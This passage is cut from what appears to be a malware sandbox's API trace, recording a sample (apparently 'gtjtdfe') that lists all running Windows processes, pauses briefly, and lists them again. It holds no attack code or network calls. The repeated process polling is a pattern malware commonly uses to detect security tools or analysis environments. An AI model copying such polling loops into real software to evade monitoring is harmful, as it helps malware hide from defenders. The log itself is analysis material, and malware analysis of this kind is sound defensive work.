th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0141.254] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0141.254] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0141.255] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0141.255] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0141.256] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0141.256] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0141.257] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0141.257] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.258] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.258] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.259] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.259] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.260] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0141.260] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.261] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.261] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0141.262] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0141.262] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0141.263] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.263] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0141.264] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0141.264] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0141.265] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0141.265] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0141.266] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0141.266] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0141.267] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0141.267] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0141.268] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0141.268] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0141.269] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0141.269] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0141.270] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0141.270] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0141.271] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0141.271] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0141.272] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0141.272] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0141.273] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0141.273] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0141.274] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0141.274] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0141.275] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.275] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0141.276] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.276] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0141.277] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.277] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0141.278] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0141.278] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0141.279] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x83c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0141.279] Process32Next (in: hSnapshot=0xa6c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x83c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0141.280] CloseHandle (hObject=0xa6c) returned 1 [0141.280] Sleep (dwMilliseconds=0x64) [0141.376] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x7a8 [0141.379] Process32First (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0141.379] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0141.380] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0141.380] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0141.382] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0141.383] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0141.383] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0141.384] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0141.384] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0141.385] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0141.385] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.386] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.386] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.387] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.387] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.388] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0141.388] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.389] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.389] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0141.390] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0141.390] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0141.391] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.397] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0141.398] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0141.398] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0141.399] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0141.399] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0141.400] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0141.400] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0141.401] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0141.401] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0141.402] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0141.402] Process32Next (in: hSnapshot=0x7a8, 